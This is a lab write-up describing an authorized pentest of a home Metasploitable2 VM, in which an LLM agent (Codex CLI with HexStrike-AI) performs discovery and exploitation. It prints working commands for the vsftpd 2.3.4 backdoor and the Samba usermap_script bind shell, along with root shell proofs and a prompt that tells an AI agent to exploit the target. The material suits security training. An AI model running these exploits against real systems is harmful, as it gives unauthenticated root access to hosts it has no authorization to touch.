HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.
- Category: AI-Assisted Pentest
- Source article: https://medium.com/@1200km/hexstrike-openai-codex-ai-driven-exploitation-of-metasploitable-b892c07be39f
- Published: 2026-01-03
- Repository: https://github.com/anpa1200/Hexstrike-AI-guide
- Preserved media: 8 article image(s), including screenshots and infographics where present.
- Preserved technical blocks: 8 code/configuration block(s).
Ecosystem Fit
This page mirrors the original Medium lab content into the 1200km knowledge base so it remains available inside the 1200km.com documentation ecosystem. Use the linked repository when one exists; otherwise use the deployment commands and configuration blocks preserved below as the lab source of truth.
Deployment Requirements
The full prerequisites, deployment flow, validation commands, screenshots, and operational notes are preserved from the article below. Review the repository metadata above first, then follow the article sections in order.
How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction
AI-assisted penetration testing is no longer a concept — it is operational reality.
In this article, I walk through a real, authorized penetration test against my own lab host running Metasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution through HexStrike-AI to perform:
- network discovery
- enumeration and service fingerprinting
- exploit selection and execution
- proof collection (root-level command output)
This was not a simulation.
Real tools were executed. Real vulnerabilities were validated. And the target was compromised with unauthenticated root access, twice, via two independent attack paths.
Core Guides and Setup
HexStrike on Kali Linux 2025.4: A Comprehensive Guide
- Focus: Initial setup and overview of the AI-powered offensive security framework.
HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape
- Focus: Analysis of AI-orchestrated pentesting and its implications.
HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…
- Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.
Practical Applications & Lab Comparisons
HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”
- Focus: Practical lab comparison of orchestration quality between different AI security tools.
AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation
- Focus: Step-by-step home lab application for network enumeration.
Specific Tooling & Technique Guides
- AI-Driven Wireless Penetration Testing. One Prompt WIFI cracking (Using HexStrike-AI)
- AI-Driven Office Documents Password Recovery with HexStrike-AI and Gemini-CLI
- AI-Driven PDF Password Recovery with HexStrike-AI and Gemini-CLI
- AI-Driven ZIP Password Recovery with HexStrike-AI and Gemini-CLI
What Is HexStrike-AI?
HexStrike-AI is not “another scanner.”
It is an orchestration layer that lets an LLM:
- decide what security tools to run
- execute them locally (or via SSH/MCP)
- interpret outputs
- adapt strategy dynamically (timeouts, missing tools, privilege constraints)
- optionally run controlled exploitation with PoC evidence
In short:
The AI plans. HexStrike executes. Kali delivers the tools.
Test Scope & Authorization
This assessment was conducted under explicit authorization.
Scope
- **Target:** 172.16.163.129
- **Environment:** private home lab (Metasploitable2 VM)
- **Attacker:** Kali Linux environment with Codex CLI + HexStrike MCP

The Prompt That Started Everything
This is the “pattern” that makes LLM-driven pentesting actually work: you must demand execution + evidence.
Example prompt structure (adapt it to your CLI):
Use the MCP server "hexstrike": Authorized pentest of 172.16.163.129
Full service discovery
Enumerate versions
Identify vulnerabilities (by severity)
Exploit critical findings
Provide proofs (command output)
Key lesson: If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.

Phase 1: Reachability and Discovery
The first attempt targeted a wrong IP (172.16.59.129) and resulted in “host seems down.”
After correcting the target to 172.16.163.129, the host responded immediately.
A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.
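A mistyped target like the one above is cheap to catch before any tool runs. The following is a minimal sketch, not part of the original workflow: `in_scope` and `check_target` are hypothetical helpers, and the `172.16.163.` prefix assumes the lab sits in a /24 around the target, which the article does not state.

```shell
#!/bin/sh
# Hypothetical scope guard: accept only addresses that start with the lab prefix.
# LAB_PREFIX is an assumption (a /24 around the target), not taken from the article.
# The comparison is purely textual; it does not validate the address itself.
LAB_PREFIX="172.16.163."

in_scope() {
  case "$1" in
    "$LAB_PREFIX"*) return 0 ;;  # address starts with the lab prefix
    *)              return 1 ;;  # anything else is treated as out of scope
  esac
}

# Report the decision and fail when the target is outside the lab range.
check_target() {
  if in_scope "$1"; then
    echo "in scope: $1"
  else
    echo "out of scope: $1"
    return 1
  fi
}
```

Calling `check_target 172.16.59.129` would have rejected the first, mistyped address before a scan was attempted.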
Phase 2: Enumeration & Service Fingerprinting
Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:
- switched from SYN scan (-sS) to TCP connect (-sT)
- used bounded host timeouts
- reduced version intensity when needed
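The adaptations above can be sketched as a small command builder. This is an illustration under stated assumptions, not the commands HexStrike actually issued: `build_scan_cmd` is a hypothetical helper, and the `120s` timeout and intensity `2` are example values. The function prints the nmap command rather than running it.

```shell
#!/bin/sh
# Sketch: choose a scan type from the caller's privileges and print the
# resulting nmap command instead of executing it.
# The timeout and intensity values are illustrative assumptions.
build_scan_cmd() {
  uid="$1"      # numeric user id, e.g. the output of `id -u`
  target="$2"   # host to scan

  if [ "$uid" -eq 0 ]; then
    scan_type="-sS"   # SYN scan needs raw-socket privileges
  else
    scan_type="-sT"   # TCP connect scan works without root
  fi

  # -sV enables version detection, --version-intensity lowers probe effort,
  # --host-timeout bounds how long nmap spends on a single host.
  echo "nmap $scan_type -sV --version-intensity 2 --host-timeout 120s $target"
}
```

A typical call would be `build_scan_cmd "$(id -u)" 172.16.163.129`, which falls back to `-sT` whenever the session is not running as root.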
Confirmed exposed services (high-level)
The target exposed multiple legacy services typical of Metasploitable2:
- FTP (21)
- SSH (22)
- Telnet (23)
- SMTP (25)
- DNS (53)
- HTTP (80)
- RPCbind (111)
- SMB (139/445)
- rlogin/rsh (513/514)
- NFS (2049)
- FTP alt (2121)
- MySQL (3306)
- PostgreSQL (5432)
- VNC (5900)
- X11 (6000)
- AJP (8009)

Host identity confirmation
The HTTP landing page provided a definitive marker:
curl -s http://172.16.163.129:80 | head -n 5
Output included:
<title>Metasploitable2 - Linux</title>
At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.
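The identity check can be made repeatable by extracting the page title instead of reading it by eye. A minimal sketch, assuming the `<title>` element opens and closes on one line as in the output shown; `extract_title` and `is_metasploitable2` are hypothetical helper names.

```shell
#!/bin/sh
# Sketch: read HTML on stdin and print the text of the first <title> element
# that opens and closes on a single line.
extract_title() {
  sed -n 's:.*<title>\(.*\)</title>.*:\1:p' | head -n 1
}

# Hypothetical check: succeed only when the title names Metasploitable2.
is_metasploitable2() {
  case "$(extract_title)" in
    *Metasploitable2*) return 0 ;;
    *)                 return 1 ;;
  esac
}
```

In the lab this could be chained as `curl -s http://172.16.163.129:80 | is_metasploitable2 && echo "lab image confirmed"`.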
Phase 3: Vulnerability Discovery (What Stood Out Immediately)
Two services were immediate critical flags due to known RCE history in this lab image:
- vsftpd 2.3.4 (commonly backdoored in lab builds)
- Samba 3.0.20 (classic usermap_script RCE path)
Rather than listing every possible CVE for every old service, the workflow focused on:
- vulnerabilities with direct, reliable exploitability
- minimal risk of destabilizing the host
- clear PoC output validation
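The triage step can be approximated as a filter over a service list. This is only a sketch: `flag_critical` is a hypothetical helper, and the "port product version" input layout is an assumption for illustration, not the format any particular scanner emits.

```shell
#!/bin/sh
# Sketch: read one service description per line on stdin and print only the
# lines matching the two versions the article flags as critical.
# The "port product version" input layout is an assumption for illustration.
flag_critical() {
  while IFS= read -r line; do
    case "$line" in
      *"vsftpd 2.3.4"*) echo "CRITICAL: $line (CVE-2011-2523)" ;;
      *"Samba 3.0.20"*) echo "CRITICAL: $line (CVE-2007-2447)" ;;
    esac
  done
}
```

Anything that does not match is dropped silently, which mirrors the decision to prioritize a short list of reliable findings over an exhaustive CVE inventory.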

Phase 4: Exploitation (With Proofs)

Exploit #1: vsftpd 2.3.4 backdoor (CVE-2011-2523) → Root
Why it worked
In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing the sequence :) triggers a backdoor listener (commonly on TCP/6200).
Step A — Trigger the backdoor
(printf "USER test:)\r\nPASS test\r\nQUIT\r\n"; sleep 1) | nc -nv -w 2 172.16.163.129 21
This confirmed:
- FTP reachable
- banner: 220 (vsFTPd 2.3.4)
Step B — Connect to backdoor shell and capture proof
printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 6200
Proof (captured output):
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/
**Impact:** Unauthenticated Remote Code Execution → root.
No persistence was deployed. No further actions were taken.
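Proof output like this can be checked mechanically rather than by eye. A minimal sketch, assuming the captured text has been saved or piped in; `is_root_proof` is a hypothetical helper name and `proof.txt` in the usage note is a hypothetical file.

```shell
#!/bin/sh
# Sketch: read captured shell output on stdin and succeed only if a line
# produced by `id` starts with an effective uid of 0 (root).
is_root_proof() {
  grep -q '^uid=0(root)'
}
```

For example, `is_root_proof < proof.txt && echo "root confirmed"` turns the captured output into a pass/fail result that can be attached to the finding.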
Exploit #2: Samba usermap_script (CVE-2007-2447) → Root bind shell
Why it worked
Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.
Tooling nuance: why a bind shell was used
The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to a bind shell payload, which is often more reliable in constrained environments.
Step A — Launch exploit with bind netcat payload (binds on port 4446)
msfconsole -q -x 'use exploit/multi/samba/usermap_script; set RHOSTS 172.16.163.129; set RPORT 139; set payload cmd/unix/bind_netcat; set LPORT 4446; set DisablePayloadHandler true; exploit -z; exit -y'
Step B — Connect to bind shell and capture proof
printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 4446
Proof (captured output):
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/
**Impact:** Unauthenticated Remote Code Execution → root.

Final Results Summary
What was validated
- Broad service exposure consistent with Metasploitable2
- Two separate unauthenticated root compromises, each independently sufficient for full takeover:
  - vsftpd backdoor (TCP/6200)
  - Samba usermap_script (bind shell on TCP/4446)

What was intentionally not done
- No persistence / backdoors
- No credential harvesting
- No data collection beyond proof commands
- No lateral movement testing
This kept the test strictly PoC-focused.
Remediation Recommendations (Real-World Perspective)
Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.
Critical
- Remove backdoored/vulnerable services immediately
- Never expose training VMs on networks shared with real assets
- Enforce segmentation (lab VLAN / host-only networks)
High
- Remove legacy cleartext and trust-based services:
  - Telnet
  - rsh/rlogin
  - VNC / X11 (unless strictly controlled)
- Restrict SMB exposure and enforce modern versions/configs
Medium
- Disable obsolete crypto (SSLv2) and weak ciphers
- Remove version banners and harden HTTP stack
- Restrict AJP to localhost/internal networks only
Low
- Reduce attack surface: firewall by default, allowlist by source
- Continuous inventory and exposure monitoring
Why This Matters
This test highlights the real value of AI in offensive workflows:
AI did not “replace” pentesting skills. It amplified them.
The LLM-driven workflow:
- selected practical next steps
- adapted to missing tools and privilege constraints
- pivoted when sessions were unstable
- still produced clean PoC artifacts
The operator still matters, but the mental overhead drops sharply.
Final Thoughts
HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.